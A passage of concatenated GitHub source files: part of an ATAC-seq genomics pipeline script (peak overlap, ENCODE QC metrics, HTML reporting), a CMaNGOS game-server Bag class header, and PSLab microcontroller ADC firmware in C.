peak_overlap_qc && peak_overlap_opt && peak_overlap_consv ) { string[] peak_overlap_ENCODE // overlap peaks if ( peak_overlap_pr.hasKey(1) && get_num_rep()==1 ) { peak_overlap_ENCODE = [peak_overlap_pr{1}] ENCODE_step_name = "anshul-kundaje:atac-seq-overlap-step-run-single-rep-v1" add_ENCODE_metadata_to_summary_json( "bed", "narrowPeak", "pseudoreplicated stable peaks", \ ENCODE_step_name, peak_overlap_pr{1}, filt_peaks ) peak_overlap_bb := peak_to_bigbed( "narrowPeak", peak_overlap_pr{1}, peak_overlap_pr{1}.dirName(), "overlap peak pr" ) wait ENCODE_step_name = "anshul-kundaje:atac-seq-pseudoreplicated-overlap-peaks-conversion-step-run-single-rep-v1" add_ENCODE_metadata_to_summary_json( "bigBed", "narrowPeak", "pseudoreplicated overlap thresholded peaks", \ ENCODE_step_name, peak_overlap_bb, [peak_overlap_pr{1}] ) } else { // find peak_overlap_opt and peak_overlap_consv peak_overlap_ENCODE = [peak_overlap_opt] ENCODE_step_name = "anshul-kundaje:atac-seq-overlap-step-run-v1" add_ENCODE_metadata_to_summary_json( "bed", "narrowPeak", "replicated peaks", \ ENCODE_step_name, peak_overlap_opt, filt_peaks ) peak_overlap_opt_bb := peak_to_bigbed( "narrowPeak", peak_overlap_opt, peak_overlap_opt.dirName(), "overlap peak opt" ) wait ENCODE_step_name = "anshul-kundaje:atac-seq-overlap-peaks-conversion-step-run-v1" add_ENCODE_metadata_to_summary_json( "bigBed", "narrowPeak", "replicated peaks", \ ENCODE_step_name, peak_overlap_opt_bb, [peak_overlap_opt]) if ( peak_overlap_consv && get_basename( peak_overlap_opt )!=get_basename( peak_overlap_consv ) ) { ENCODE_step_name = "anshul-kundaje:atac-seq-overlap-step-run-v1" add_ENCODE_metadata_to_summary_json( "bed", "narrowPeak", "conservative replicated peaks", \ ENCODE_step_name, peak_overlap_consv, filt_peaks ) peak_overlap_consv_bb := peak_to_bigbed( "narrowPeak", peak_overlap_consv, peak_overlap_consv.dirName(), "overlap peak consv" ) wait ENCODE_step_name = "anshul-kundaje:atac-seq-overlap-peaks-conversion-step-run-v1" add_ENCODE_metadata_to_summary_json( "bigBed", "narrowPeak", "conservative replicated peaks", \ ENCODE_step_name, peak_overlap_consv_bb, [peak_overlap_consv] ) } } if ( !true_rep ) { if ( get_num_rep()==1 ) ENCODE_step_name = "anshul-kundaje:atac-seq-overlap-step-run-single-rep-v1" else ENCODE_step_name = "anshul-kundaje:atac-seq-overlap-step-run-v1" add_ENCODE_quality_metrics_to_summary_json( "overlap_quality_metric", \ ENCODE_step_name, \ peak_overlap_ENCODE, \ [ peak_overlap_qc, \ peak_overlap_qc_FRiP.hasKey("ppr") ? peak_overlap_qc_FRiP{"ppr"} : "",\ peak_overlap_qc_FRiP.hasKey("rep1-rep2") ? peak_overlap_qc_FRiP{"rep1-rep2"} : "",\ peak_overlap_qc_FRiP.hasKey("rep1-pr") ? peak_overlap_qc_FRiP{"rep1-pr"} : "",\ peak_overlap_qc_FRiP.hasKey("rep2-pr") ? peak_overlap_qc_FRiP{"rep2-pr"} : ""]) } } wait print( "\n== Done filter_peak_and_convert_to_bigbed()\n" ) } void ataqc() { if ( no_ataqc || align ) return if ( is_input_peak() ) return for (int rep=1; rep<=get_num_rep(); rep++) { if ( no_par ) ataqc( rep ) else par ataqc( rep ) } wait print( "\n== Done ataqc()\n" ) } void ataqc( int rep ) { if ( true_rep ) { print("Warning: ATAQC cannot run with a flag -true_rep\n"); return } if ( no_dup_removal ) { print("Warning: ATAQC cannot run with the flag -no_dup_removal\n"); return } group := get_group_name( rep ) long := get_long_group_name( rep ) qc_o_dir := mkdir( "$out_dir/qc/$group" ) aln_o_dir := mkdir( "$out_dir/align/$group" ) // create align output directory if ( bam.hasKey(rep) ) { string idr_ataqc, peak if ( !enable_idr ) { idr_ataqc = "" peak = peak_overlap_opt } else if ( get_num_rep() == 1 ) { idr_ataqc = idr_pr{1} peak = idr_pr{rep} } else { idr_ataqc = idr_opt peak = idr_pr{rep} } string ataqc_html if ( is_se( rep ) ) { ( ataqc_html, ataqc_qc{rep} ) = ataqc( fastq{rep}, "", bam{rep}, align_log{rep}, pbc_qc{rep}, \ dup_qc{rep}, filt_bam{rep}, final_tag{rep}, pval_bigwig_001{rep}, peak, \ peak_overlap_opt, idr_ataqc, qc_o_dir, group ) } else { ( ataqc_html, ataqc_qc{rep} ) = ataqc( fastq{rep+",1"}, fastq{rep+",2"}, bam{rep}, align_log{rep}, pbc_qc{rep}, \ dup_qc{rep}, filt_bam{rep}, final_tag{rep}, pval_bigwig_001{rep}, peak, \ peak_overlap_opt, idr_ataqc, qc_o_dir, group ) } add_file_to_report( ataqc_html, "ATAQC\\nreport", group, "QC and logs/ATAQC/$long/ATAQC HTML report" ) } } void report() { wait string html html += html_title() html += html_cmd_line_args() html += html_conf_file_info() html += html_pipeline_version( "https://github.com/kundajelab/atac_dnase_pipelines/commit" ) // pipeline version info html += html_filetable() // treeview for directory and file structure html += html_atac_tracks() // epigenome browser tracks html += html_graph() // graphviz workflow diagram html += html_atac_QC() // show QC tables and images report( html ) write_summary_json() print( "\n== Done report()\n" ) } string html_atac_QC() { string[] align_qcs, flagstat_qcs, dup_qcs, flagstat_nodup_qcs, pbc_qcs, xcor_qcs, xcor_plots, ataqc_qcs string[] groups for ( int rep=1; rep <= get_num_rep(); rep++) { group := "rep$rep" key := "$rep" groups.add( group ) if ( xcor_qc.hasKey( key ) ) { xcor_qcs += xcor_qc{key} xcor_plots += xcor_plot{key} } if ( flagstat_qc.hasKey( key ) ) flagstat_qcs += flagstat_qc{key} if ( dup_qc.hasKey( key ) ) dup_qcs += dup_qc{key} if ( flagstat_nodup_qc.hasKey( key ) ) flagstat_nodup_qcs += flagstat_nodup_qc{key} if ( pbc_qc.hasKey( key ) ) pbc_qcs += pbc_qc{key} if ( ataqc_qc.hasKey( key ) ) ataqc_qcs += ataqc_qc{key} } html := "<div id='atac_qc'>" html += "<div style='float:left'>" html += html_table_multiple_logs( "Flagstat (raw) QC", false, "flagstat", groups, flagstat_qcs ) html += "</div>" if ( !no_dup_removal ) { html += "<div style='float:left'>" html += html_table_multiple_logs( "Dup. QC", false, "dup", groups, dup_qcs ) html += "</div>" html += "<div style='float:left'>" html += html_table_multiple_logs( "Flagstat (filtered) QC", false, "flagstat_filt", groups, flagstat_nodup_qcs ) html += "</div>" html += "<div style='float:left'>" html += html_table_multiple_logs( "Library Complexity QC", false, has_pe() ? "pbc_PE" : "pbc", groups, pbc_qcs ) if ( pbc_qcs.size()>0 ) html += html_help_pbc() html += "</div>" } html += "<div style='float:left'>" html += html_table_multiple_logs( "Enrichment QC (strand cross-correlation measures)", false, "xcor", groups, xcor_qcs ) if ( xcor_qcs.size()>0 ) html += html_help_xcor( subsample_xcor, has_se(), has_pe() ) html += "</div>" // xcor images for ( int i=0; i<xcor_plots.size(); i++ ) { png := pdf_to_png( xcor_plots[i] ) html += html_img( png, 500, groups[i] ) + "&nbsp" } // number of peaks if ( num_peak_log ) { html += "<div style='float:left'>" html += html_table_multiple_logs( "Number of peaks", false, "num_peaks", num_peak_log ) html += html_help_num_peaks() html += "</div>" } // FRiP (Naive overlap) if ( peak_overlap_qc_FRiP.size()>0 ) { html += "<div style='float:left'>" html += html_table_multiple_logs( "Enrichment QC (Fraction of reads in overlapping peaks)", false, "overlap_FRiP", peak_overlap_qc_FRiP ) html += html_help_peak_overlap_FRiP() html += "</div>" } if ( peak_overlap_qc != "" ) { html += "<div style='float:left'>" html += html_table_multiple_logs( "Reproducibility QC and Peak Detection Statistics (Overlapping peaks)", \ false, "overlap", ["rep1"], [peak_overlap_qc] ) html += html_help_peak_overlap() html += "</div>" } // FRiP (IDR) if ( idr_qc_FRiP.size()>0 ) { html += "<div style='float:left'>" html += html_table_multiple_logs( "Enrichment QC (Fraction of reads in IDR peaks)", false, "idr_FRiP", idr_qc_FRiP ) html += html_help_idr_FRiP() html += "</div>" } if ( idr_qc != "" ) { html += "<div style='float:left'>" html += html_table_multiple_logs( "Reproducibility QC and Peak Detection Statistics (Irreproducible Discovery Rate)", \ false, "idr", ["rep1"], [idr_qc] ) html += html_help_idr( idr_thresh ) html += "</div>" } for ( int i=1; i<=get_num_rep(); i++ ) { for ( int j=i+1; j<=get_num_rep(); j++ ) { if ( idr_tr_png.hasKey("$i,$j") ) \ html += html_img( idr_tr_png{"$i,$j"}, 800, "true reps (rep$i-rep$j)" ) + "&nbsp" } } if ( idr_ppr_png != "" ) html += html_img( idr_ppr_png, 800, "pooled pseudo-reps" ) + "&nbsp" for ( int i=1; i<=get_num_rep(); i++ ) { if ( !true_rep ) { if ( idr_pr_png.hasKey(i) ) \ html += html_img( idr_pr_png{i}, 800, "rep$i pseudo-reps" ) + "&nbsp" } } html += "<div style='float:left'>" html += html_table_multiple_logs( "ATAQC", false, "ataqc", groups, ataqc_qcs ) html += "</div>" html += "</div><br>" return html } string html_atac_tracks() { if ( no_browser_tracks ) return "" string[] trk_files, trk_types, trk_names, trk_colors string color // for (int rep=1; rep<=get_num_rep(); rep++) { // color = get_predefined_rgb_str( rep ) // if ( bam.hasKey(rep) ) { trk_types += "bam"; trk_names += "$title bam (rep$rep)"; trk_colors += color; trk_files += bam{rep} } // } color = get_predefined_rgb_str( 0 ) // color for pooled reps if ( pval_bigwig_001.hasKey( "pooled" ) ) { trk_types += "bigwig"; trk_names += "$title pval (pooled)"; trk_colors += color; trk_files += pval_bigwig_001{"pooled"} } if ( peak_overlap_opt != "" ) { trk_types += "hammock"; trk_names += "$title peak overlap"; trk_colors += color; trk_files += peak_to_hammock( peak_overlap_opt ) } if ( idr_opt != "" ) { trk_types += "hammock"; trk_names += "$title peak idr (opt. set)"; trk_colors += color; trk_files += peak_to_hammock( _get_idr_peak_trk( idr_opt ) ) } // find IDR tracks for (int rep=1; rep<=get_num_rep(); rep++) { color = get_predefined_rgb_str( rep ) if ( pval_bigwig_001.hasKey( "$rep" ) ) { trk_types += "bigwig"; trk_names += "$title pval (rep$rep)"; trk_colors += color; trk_files += pval_bigwig_001{rep} } if ( peak_001.hasKey( "$rep" ) ) { trk_types += "hammock"; trk_names += "$title peak (rep$rep)"; trk_colors += color; trk_files += peak_to_hammock( peak_001{rep} ) } if ( idr_pr.hasKey(rep) ) { trk_types += "hammock"; trk_names += "$title peak idr (rep$rep-pr)"; trk_colors += color; trk_files += peak_to_hammock( _get_idr_peak_trk( idr_pr{rep} ) ) } } html := html_epg_browser_viz( trk_files, trk_types, trk_names, trk_colors, species_browser ) return html } void help() { if ( is_cmd_line_arg_empty() ) { printHelp() exit } } bool is_atac_seq() { return type.toLower().startsWith( "atac" ) } bool is_dnase_seq() { return type.toLower().startsWith( "dnase" ) } void tar_all_logs() { // *.align.log: bowtie2 log // *_qc.txt: ATAQC text report // *_qc.html: ATAQC HTML report string tar mkdir("$out_dir/qc") if ( title ) tar = "$out_dir/qc/$title.all_quality_metrics.tar" else tar = "$out_dir/qc/all_quality_metrics.tar" taskName:= "tar_all_logs" system := "local" tid := task { sys cd $out_dir sys find . -type f \ -name '*.align.log' -or \ -name '*.dot' -or \ -name '*.svg' -or \ -name '*.css' -or \ -name '*.json' -or \ -name '*.html' -or \ -name '*.js' -or \ -name '*.qc' -or \ -name '*.pdf' -or \ -name '*.png' -or \ -name '*_qc.txt' -or \ -name '*read_length.txt' \ -name '*number_of_peaks.txt' \ | xargs tar -cvf $tar } wait if ( peak_overlap_opt ) { string[] quality_metric_of string ENCODE_step_name if ( peak_overlap_pr.hasKey(1) && get_num_rep()==1 ) { ENCODE_step_name = "anshul-kundaje:atac-seq-overlap-step-run-single-rep-v1" quality_metric_of.add(peak_overlap_pr{1}) } else { ENCODE_step_name = "anshul-kundaje:atac-seq-overlap-step-run-v1" quality_metric_of.add(peak_overlap_opt) } add_ENCODE_quality_metrics_to_summary_json( "generic_quality_metric", ENCODE_step_name, \ quality_metric_of, [tar] ) } } void ENCODE3_overall_qc() { //// QC for individual replicate for ( int rep=1; rep<=get_num_rep(); rep++ ) { string{} QC if ( rep == 1 ) { if ( idr_opt ) { npeak := get_num_lines( idr_opt ) QC{"03_No. of IDR peaks"} = npeak QC{"03_IDR peaks pass? (threshold > 70K)"} = npeak >= 70000 ? "OK" : "FAIL" } if ( peak_overlap_opt ) { num_overlap_peaks := get_num_lines( peak_overlap_opt ) QC{"04_No. of naive overlap peaks"} = num_overlap_peaks QC{"04_Naive overlap peaks pass? (> 150K)"} = num_overlap_peaks >= 150000 ? "OK" : "FAIL" } // FRIP >0.1 ok (idr) if ( idr_qc_FRiP.hasKey("ppr") ) { idr_qc_FRiP_log := parse_idr_FRiP( idr_qc_FRiP{"ppr"} ) FRiP := parse_real( idr_qc_FRiP_log{"FRiP"} ) QC{"06_IDR FRiP of pooled sample"} = FRiP QC{"06_IDR FRiP of pooled sample QC pass? (> 0.1)"} = FRiP >= 0.1 ? "OK" : "FAIL" } // FRIP >0.1 ok (overlapping peaks) if ( peak_overlap_qc_FRiP.hasKey("ppr") ) { peak_overlap_qc_FRiP_log := parse_idr_FRiP( peak_overlap_qc_FRiP{"ppr"} ) FRiP := parse_real( peak_overlap_qc_FRiP_log{"FRiP"} ) QC{"06_Overlap FRiP of pooled sample"} = FRiP QC{"06_Overlap FRiP of pooled sample QC pass? (> 0.1)"} = FRiP >= 0.1 ? "OK" : "FAIL" } // IDR reproducibility test (IDR) if ( idr_qc ) { idr_log := parse_idr( idr_qc ) QC{"07_IDR reproducibility"} = idr_log{"reproducibility_test"}.toUpper() } } if ( idr_qc_FRiP.hasKey("rep$rep-pr") ) { idr_qc_FRiP_log := parse_idr_FRiP( idr_qc_FRiP{"rep$rep-pr"} ) FRiP := parse_real( idr_qc_FRiP_log{"FRiP"} ) QC{"06_IDR FRiP"} = FRiP } if ( peak_overlap_qc_FRiP.hasKey("rep$rep-pr") ) { peak_overlap_qc_FRiP_log := parse_idr_FRiP( peak_overlap_qc_FRiP{"rep$rep-pr"} ) FRiP := parse_real( peak_overlap_qc_FRiP_log{"FRiP"} ) QC{"06_Overlap FRiP"} = FRiP } if ( flagstat_qc.hasKey(rep) && flagstat_nodup_qc.hasKey(rep) ) { flagstat_log := parse_flagstat(flagstat_qc{rep}) flagstat_nodup_log := parse_flagstat(flagstat_nodup_qc{rep}) // num nodup reads > 50000000 (PE), > 25000000 (SE) num_raw_reads := parse_int( flagstat_log{"total"} ) num_mapped_reads := parse_int( flagstat_log{"mapped"} ) num_nodup_reads := parse_int( flagstat_nodup_log{"total"} ) QC{"01_No. of mapped nodup nomito reads"} = num_nodup_reads if ( is_se( rep ) ) { QC{"01_Read depth pass? (>50M for PE, >25M SE)"} = num_nodup_reads >= 25000000 ? "OK" : "FAIL" } else { QC{"01_Read depth pass? (>50M for PE, >25M SE)"} = num_nodup_reads >= 50000000 ? "OK" : "FAIL" } // alignment rate > 80% ok, > 95% good (FLAGSTAT.%MAPPED) alignment_rate := "$num_mapped_reads".parseReal()/"$num_raw_reads".parseReal() QC{"02_Alignment rate"} = alignment_rate QC{"02_Alignment rate pass? (>0.95 OK, >0.8 ACCEPTABLE"} = alignment_rate >= 0.95 ? "OK" : \ ( alignment_rate >= 0.80 ? "ACCEPTABLE" : "FAIL" ) } // FRIP >0.1 ok if ( idr_qc_FRiP.hasKey("rep$rep-pr") ) { idr_qc_FRiP_log := parse_idr_FRiP( idr_qc_FRiP{"rep$rep-pr"} ) FRiP := parse_real( idr_qc_FRiP_log{"FRiP"} ) QC{"05_FRiP per replicate"} = FRiP QC{"05_FRiP per replicate QC pass? (> 0.1)"} = FRiP >= 0.1 ? "OK" : "FAIL" } if ( ataqc_qc.hasKey(rep) ) { ataqc_log := parse_multi_col_txt( ataqc_qc{rep} ) // TSS enrichment (ATAQC) > 10 TSS_enrichment := parse_real( ataqc_log{"TSS_enrichment"} ) QC{"08_TSS enrichment"} = TSS_enrichment QC{"08_TSS enrichment pass? (> 10)"} = TSS_enrichment >= 10.0 ? "OK" : "FAIL" // NFR present (ATAQC) QC{"09_NFR region"} = ataqc_log.hasKey("Presence of NFR peak") ? \ ataqc_log{"Presence of NFR peak"} : "N/A" // (SKIP) mono-nucleosome peak present? 147*2 > length > 147. QC{"10_mono-nuc region"} = ataqc_log.hasKey("Presence of Mono-Nuc peak") ? \ ataqc_log{"Presence of Mono-Nuc peak"} : "N/A" } if ( pbc_qc.hasKey(rep) ) { pbc_log := parse_pbc(pbc_qc{rep}) QC{"11_NRF"} = pbc_log{"NRF"} QC{"12_PBC1"} = pbc_log{"PBC1"} QC{"13_PBC2"} = pbc_log{"PBC2"} } _summary_qc.add( map_to_json_str( \ { "info"=>"rep$rep","qc_type"=>"ENCODE3_qc_consolidated",\ "header"=>array_to_str(get_map_keys( QC ),"\\t"),\ "contents"=>array_to_str(get_map_vals( QC ),"\\t") } ) ) } }
{ "pile_set_name": "Github" }
/* * This file is part of the CMaNGOS Project. See AUTHORS file for Copyright information * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 2 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program; if not, write to the Free Software * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA */ #ifndef MANGOS_BAG_H #define MANGOS_BAG_H #include "Common.h" #include "Entities/Item.h" enum InventorySlot { NULL_BAG = 0, NULL_SLOT = 255 }; // Maximum 36 Slots ( (CONTAINER_END - CONTAINER_FIELD_SLOT_1)/2 #define MAX_BAG_SIZE 36 // 2.0.12 class Bag : public Item { public: Bag(); ~Bag(); void AddToWorld() override; void RemoveFromWorld() override; bool Create(uint32 guidlow, uint32 itemid, Player const* owner) override; void StoreItem(uint8 slot, Item* pItem); void RemoveItem(uint8 slot); Item* GetItemByPos(uint8 slot) const; Item* GetItemByEntry(uint32 item) const; uint32 GetItemCount(uint32 item, Item* eItem = nullptr) const; uint8 GetSlotByItemGUID(ObjectGuid guid) const; bool IsEmpty() const; uint32 GetFreeSlots() const; uint32 GetBagSize() const { return GetUInt32Value(CONTAINER_FIELD_NUM_SLOTS); } // DB operations // overwrite virtual Item::SaveToDB void SaveToDB() override; // overwrite virtual Item::LoadFromDB bool LoadFromDB(uint32 guidLow, Field* fields, ObjectGuid ownerGuid = ObjectGuid()) override; // overwrite virtual Item::DeleteFromDB void DeleteFromDB() override; void BuildCreateUpdateBlockForPlayer(UpdateData* data, Player* target) const override; protected: // Bag Storage space Item* m_bagslot[MAX_BAG_SIZE]; }; inline Item* NewItemOrBag(ItemPrototype const* proto) { if (proto->InventoryType == INVTYPE_BAG) return new Bag; return new Item; } #endif
{ "pile_set_name": "Github" }
/******************************************************************************/ /******** This file contains ADC control modules of function.c file ***********/ /******************************************************************************/ #include "COMMANDS.h" #include "Common_Functions.h" #include "PSLAB_SPI.h" #include "PSLAB_ADC.h" BYTE CHOSA = 3; BYTE CH123SA = 0; BYTE conversion_done = 1; BYTE TRIGGERED = 0; BYTE TRIGGER_READY = 0; BYTE TRIGGER_CHANNEL = 0; BYTE ADC_CHANNELS = 0; uint16 TRIGGER_TIMEOUT = 100, TRIGGER_WAITING = 0, TRIGGER_LEVEL = 0, TRIGGER_PRESCALER = 0; uint16 adval; uint16 ADC_DELAY = 5; int *buff0, *buff1, *buff2, *buff3; int samples = 0; uint16 samples_to_fetch = BUFFER_SIZE; int __attribute__((section("adcbuff"), far)) ADCbuffer[BUFFER_SIZE]; void __attribute__((interrupt, no_auto_psv)) _AD1Interrupt(void) { _AD1IF = 0; if (conversion_done) { return; } LEDPIN = 1; if (TRIGGERED) { *(buff0++) = (ADC1BUF0); //&0x3ff; if (ADC_CHANNELS >= 1) { *(buff1++) = (ADC1BUF1); //&0x3ff; if (ADC_CHANNELS >= 2) { *buff2++ = (ADC1BUF2); //&0x3ff; if (ADC_CHANNELS >= 3)*buff3++ = (ADC1BUF3); //&0x3ff; } } samples++; LEDPIN = 0; if (samples == samples_to_fetch) { _AD1IF = 0; _AD1IE = 0; //disable any further interrupts until required conversion_done = 1; LEDPIN = 1; } } else { if (TRIGGER_CHANNEL & 1)adval = ADC1BUF0; else if (TRIGGER_CHANNEL & 2)adval = ADC1BUF1; else if (TRIGGER_CHANNEL & 4)adval = ADC1BUF2; else if (TRIGGER_CHANNEL & 8)adval = ADC1BUF3; //-------If the trigger hasn't timed out yet ... ---------- if (TRIGGER_WAITING < TRIGGER_TIMEOUT) { TRIGGER_WAITING += (ADC_DELAY >> TRIGGER_PRESCALER); if (!TRIGGER_READY && adval > TRIGGER_LEVEL + 10)TRIGGER_READY = 1; else if (adval <= TRIGGER_LEVEL && TRIGGER_READY) { TRIGGERED = 1; } } //-------If the trigger has timed out, then proceed to data acquisition ---------- else { TRIGGERED = 1; } } } void initADCCTMU(void){ _AD1IF = 0; _AD1IE = 0; //disable ADC interrupts disableADCDMA();DisableComparator(); AD1CON1bits.ADON = 0; //turn off ADC AD1CON2 = 0; AD1CON4 = 0x0000; AD1CSSH = 0x0000; AD1CSSL = 0x0000; AD1CON1bits.AD12B = 1; /* Assign MUXA inputs for block read */ AD1CHS0bits.CH0SA = CHOSA; AD1CON3bits.ADRC = 0; //do not use internal clock AD1CON1bits.SSRCG = 0; AD1CON1bits.SSRC = 0b000; //Clearing SAMP bit stops sampling and triggers conversion AD1CON1bits.SIMSAM = 0; //simultaneous sampling. AD1CON1bits.ASAM = 0; //no auto sampling AD1CON3bits.SAMC = 0x10; // Sample for (x+1)*Tad before triggering conversion AD1CON2bits.SMPI = 0; AD1CON3bits.ADCS = 0xA; // Conversion clock x*Tp } void DisableComparator() { CM4CONbits.CON = 0; PMD3bits.CMPMD = 1; } void EnableComparator() { /*----setup comparator---*/ CVRCONbits.VREFSEL = 0; // Voltage reference is generated by resistor network CVRCONbits.CVREN = 1; // Enable comparator reference source CVRCONbits.CVRR = 0; // Step size is CVRSRC/32 CVRCONbits.CVR = 7; // CVREFIN = (1/4)*(3.3) + (7/32)*(3.3) = 1.54V CM4CONbits.CCH = 0; // VIN - input of comparator connects to C4IN1- CM4CONbits.CREF = 1; // VIN+ input connected to CVRefin voltage source CM4CONbits.EVPOL = 1; // Trigger/Event/Interrupt generated on high to low CM4CONbits.CPOL = 0; // Comparator output is not inverted CM4CONbits.CEVT = 0; CM4CONbits.COE = 1; // Comparator output is present on CxOUT pin CM4FLTRbits.CFSEL = 0; // Choose CPU instruction clock (TCY) CM4FLTRbits.CFDIV = 4; // Choose comparator filter clock CM4FLTRbits.CFLTREN = 1; // Digital filter enabled CM4MSKSRCbits.SELSRCA = 1; // PWM1H1 is the source for Mask A input CM4MSKCONbits.HLMS = 1; // Mask input will prevent comparator output CM4MSKCONbits.OAEN = 1; // OR Gate A input enabled CM4CONbits.CON = 1; // Comparator is enabled PMD3bits.CMPMD = 0; // Enable Comparator } void initADC10(void) { /* Set port configuration */ AD1CON1 = 0; disableADCDMA(); /* Initialize ADC module */ AD1CON1bits.AD12B = 0; AD1CON1bits.SSRCG = 0; AD1CON1bits.SSRC = 4; //Timer5 compare starts conversion AD1CON1bits.ASAM = 1; //auto sampling AD1CON1bits.SIMSAM = 1; //simultaneous sampling AD1CHS0bits.CH0SA = CHOSA; //AN3 - CH0 AD1CHS0bits.CH0NA = 0; AD1CHS123bits.CH123SA = CH123SA; //AN0 -> CH1 , AN1 -> ch2, AN2 -> ch3 AD1CHS123bits.CH123NA = 0; //-ve of CH1,2,3 to -vref AD1CON2bits.SMPI = 0; //generate interrupt after converting all chans AD1CON4 = 0x0000; AD1CSSH = 0x0000; AD1CSSL = 0x0000; /* Assign MUXA inputs for block read */ _AD1IF = 0; _AD1IE = 0; //disable ADC interrupt until required //AD1CON3bits.SAMC = 0; // SAMC - Sample for (x+1)*Tad before triggering conversion (TMR5 will decide this here) AD1CON3bits.ADCS = 1; // Conversion clock x*Tp AD1CON3bits.ADRC = 0; //use clock derived from system clock AD1CON1bits.ADON = 1; Delay_us(20); T5CONbits.TON = 0; T5CONbits.TSIDL = 1; T5CONbits.TCKPS = 1; TMR5 = 0x0000; T5CONbits.TON = 1; _T5IF = 0; _T5IE = 0; } void initADCDMA(BYTE bits) { /* Set port configuration */ AD1CON1 = 0; /* Initialize ADC module */ AD1CON1bits.AD12B = bits; AD1CON1bits.SSRCG = 0; AD1CON1bits.SSRC = 4; //Timer5 compare starts conversion AD1CON1bits.ASAM = 1; //auto sampling AD1CON1bits.SIMSAM = 1; //simultaneous sampling AD1CHS0bits.CH0SA = CHOSA; AD1CHS0bits.CH0NA = 0; AD1CHS123bits.CH123SA = CH123SA; //AN0 -> CH1 , AN1 -> ch2, AN2 -> ch3 AD1CHS123bits.CH123NA = 0; //-ve of CH1,2,3 to -vref AD1CON2bits.SMPI = 0; //generate interrupt after converting all chans AD1CON4 = 0x0000; AD1CSSH = 0x0000; AD1CSSL = 0x0000; /* Assign MUXA inputs for block read */ _AD1IF = 0; _AD1IE = 0; //disable ADC interrupt until required AD1CON3bits.ADCS = 1; // Conversion clock x*Tp AD1CON3bits.ADRC = 0; //use clock derived from system clock AD1CON1bits.ADON = 1; Delay_us(20); T5CONbits.TON = 0; T5CONbits.TSIDL = 1; T5CONbits.TCKPS = 1; TMR5 = 0x0000; _T5IF = 0; _T5IE = 0; DMA0CONbits.CHEN = 0; DMA0CONbits.AMODE = 0b00; // Register indirect with post increment DMA0CONbits.MODE = 0b01; // One Shot, Ping-Pong mode Disabled DMA0CONbits.DIR = 0; // Peripheral to RAM DMA0REQ = 0b1101; // Select ADC module as DMA request source DMA_MODE = DMA_LA_ONE_CHAN; enableADCDMA(); } void initADC12bit_scope(void) { /* Set port configuration */ disableADCDMA(); AD1CON1bits.ADON = 0; /* Initialize ADC module */ AD1CON1bits.AD12B = 1; AD1CON1bits.SSRCG = 0; AD1CON1bits.SSRC = 4; //Timer5 compare starts conversion AD1CON1bits.ASAM = 1; //auto sampling AD1CHS0bits.CH0SA = CHOSA; //AN3 - CH0 AD1CHS0bits.CH0NA = 0; AD1CON2bits.SMPI = 0; //generate interrupt after converting all chans AD1CON4 = 0x0000; AD1CSSH = 0x0000; AD1CSSL = 0x0000; /* Assign MUXA inputs for block read */ _AD1IF = 0; _AD1IE = 0; //disable ADC interrupt until required AD1CON3bits.ADCS = 9; // Conversion clock x*Tp AD1CON3bits.ADRC = 0; //use clock derived from system clock AD1CON1bits.ADON = 1; Delay_us(20); T5CONbits.TON = 0; T5CONbits.TSIDL = 1; T5CONbits.TCKPS = 1; TMR5 = 0x0000; T5CONbits.TON = 1; _T5IF = 0; _T5IE = 0; } void initADC12(void) { _AD1IF = 0; _AD1IE = 0; disableADCDMA(); AD1CON2 = 0; AD1CON4 = 0x0000; AD1CSSH = 0x0000; AD1CSSL = 0x0000; AD1CON1bits.ADON = 0; AD1CON1bits.AD12B = 1; AD1CON1bits.ADSIDL = 0; AD1CON3bits.ADRC = 1; //use internal clock AD1CON1bits.SSRCG = 0; AD1CON2bits.CHPS = 0; AD1CHS0bits.CH0SA = CHOSA; //AN3 - CH0 AD1CHS0bits.CH0NA = 0; AD1CON1bits.SSRC = 7; //Internal counter ends sampling, starts conversion //AD1CON1bits.SIMSAM = 0; //simultaneous sampling . Not applicable for single channel sampling AD1CON1bits.ASAM = 0; // No auto sampling AD1CON2bits.SMPI = 0; //generate interrupt after argument+1 conversion /* Assign MUXA inputs for block read */ //AD1CHS0bits.CH0SA = channel; //AN<channel> connected to CH0 AD1CON3bits.SAMC = 0x1f; // Sample for (x+1)*Tad before triggering conversion AD1CON3bits.ADCS = 9; // Conversion clock x*Tp //AD1CON2bits.CHPS = 0; //unimplemented in 12 bit mode. read as 0 AD1CON1bits.ADON = 1; Delay_us(20); } void initADC12_averaging16() { _AD1IF = 0; _AD1IE = 0; //disable ADC interrupts disableADCDMA(); AD1CON1bits.ADON = 0; //turn off ADC. AD1CON2 = 0; AD1CON4 = 0x0000; AD1CSSH = 0x0000; AD1CSSL = 0x0000; AD1CON1bits.AD12B = 1; //12 bit mode AD1CON1bits.ADSIDL = 0; //continue operation in idle AD1CON3bits.ADRC = 0; //do not use internal clock AD1CON1bits.SSRCG = 0; AD1CON2bits.CHPS = 0; /* Assign MUXA inputs for block read */ AD1CHS0bits.CH0SA = CHOSA; AD1CHS0bits.CH0NA = 0; AD1CON1bits.SSRC = 7; //Internal counter ends sampling, starts conversion (SSRCG=0) AD1CON3bits.SAMC = 0x10; // Sample for (x+1)*Tad before triggering conversion AD1CON3bits.ADCS = 0xA; // Conversion clock Tad = ADCS*Tp(15nS)) AD1CON2bits.SMPI = 15; //generate interrupt after argument+1 conversions } void setADCMode(BYTE mode, BYTE chosa, BYTE ch123sa) { if (ADC_MODE == mode && chosa == CHOSA && ch123sa == CH123SA)return; else { if (CHOSA == 7 || CHOSA == 5)DisableComparator(); ADC_MODE = mode; CHOSA = chosa; CH123SA = ch123sa; if (mode == ADC_10BIT_SIMULTANEOUS)initADC10(); else if (mode == ADC_10BIT_DMA)initADCDMA(0); //12 bit mode disabled else if (mode == ADC_12BIT_DMA)initADCDMA(1); //12 bit mode else if (mode == ADC_12BIT)initADC12(); else if (mode == ADC_12BIT_SCOPE)initADC12bit_scope(); else if (mode == ADC_12BIT_AVERAGING)initADC12_averaging16(); else if (mode == ADC_CTMU)initADCCTMU(); } } uint16 get_voltage_summed(BYTE channel) { setADCMode(ADC_12BIT_AVERAGING, channel, 0); AD1CON1bits.ADON = 1; Delay_us(20); //Turn on the ADC AD1CON1bits.ASAM = 1; // auto sampling _AD1IF = 